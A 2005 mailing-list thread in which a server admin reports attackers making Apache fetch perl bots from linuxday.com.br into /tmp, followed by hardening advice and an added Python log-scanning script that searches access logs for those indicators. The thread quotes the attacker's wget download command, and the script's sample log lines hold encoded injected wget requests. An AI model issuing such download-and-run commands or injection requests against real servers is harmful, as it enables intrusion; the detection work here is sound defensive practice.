> On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx
> <paul@xxxxxxxxxxxxxxxxxxx> wrote:
>> Apparently someone has hacked into my webserver. And is installing perl
>> scripts into the /tmp/ directory. They're usually named .linuxday* or
>> .cinta* and a few other names as well.
>>
>> From what I can tell something is causing apache to run a command like
>> "sh wget bot.linuxday.com.br -O {the above mentioned files are then
>> listed}"
>>
>> sometimes the site is worm.linuxday.com.br
>>
>> I'm curious if anyone has heard about this before. I'm currently running
>> Fedora 1 with all the latest security patches.
>
> The only way to ensure your system is clean, and likely to remain clean,
> is to:
>
> 1. Do a bare metal install
> 2. Change all passwords to new strong passwords
> 3. Disable cleartext services, ftp, telnet, rsh, etc.
> 4. Disable root remote login (use su or sudo)
> 5. Restore your uncompromised data
> 6. etc.
>
> I had to do this for a client and the next 3 days the intruder tried
> to get back in.
>
> --
> Leonard Isham, CISSP
> Ostendo non ostento.

In place of FTP, what would you suggest? That is the only clear-text
password service I allow. So what else can I use in place of that? And
shell access is denied for all accounts except for 2.

I get the feeling this came in on awstats, although I'm not 100% positive,
and I'm wanting to find out how it got in first before I just delete and
start over again.
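
Added example, not part of the original thread: one way to check which web script received the requests is to search the Apache access log for the indicators named in the post (the linuxday.com.br hosts, the /tmp/.linuxday* and /tmp/.cinta* file names, and the wget command) after URL-decoding each request. It assumes the common/combined log format; the sample lines, the script name `stats.pl` and the parameter `opt` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the post: download hosts, dropped-file prefixes, fetch command.
INDICATORS = ("linuxday.com.br", "/tmp/.linuxday", "/tmp/.cinta", "wget ")

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def decode(target, rounds=3):
    """URL-decode repeatedly so single- and double-encoded requests both surface."""
    for _ in range(rounds):
        nxt = unquote_plus(target)
        if nxt == target:
            break
        target = nxt
    return target

def suspicious_requests(lines):
    """Return (client, time, script_path, status, matched_indicators) per flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, when, _method, target, status = m.groups()
        decoded = decode(target).lower()
        matched = [i for i in INDICATORS if i in decoded]
        if matched:
            script = target.split("?", 1)[0]  # the script that received the request
            hits.append((client, when, script, int(status), matched))
    return hits

# Constructed sample lines (documentation addresses, hypothetical script and parameter).
SAMPLE = [
    '192.0.2.10 - - [17/Feb/2005:21:02:11 -0800] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Feb/2005:21:40:03 -0800] "GET /cgi-bin/stats.pl'
    '?opt=wget%20bot.linuxday.com.br%20-O%20/tmp/.linuxday1 HTTP/1.0" 200 312',
    '198.51.100.7 - - [17/Feb/2005:21:41:19 -0800] "GET /cgi-bin/stats.pl'
    '?opt=wget%2520worm.linuxday.com.br HTTP/1.0" 200 298',
    '203.0.113.5 - - [17/Feb/2005:22:00:00 -0800] "GET /docs/wget-howto.html HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```

The script path in each hit shows which CGI or page was the entry point, and the timestamps can be compared with the modification times of the files found in /tmp/.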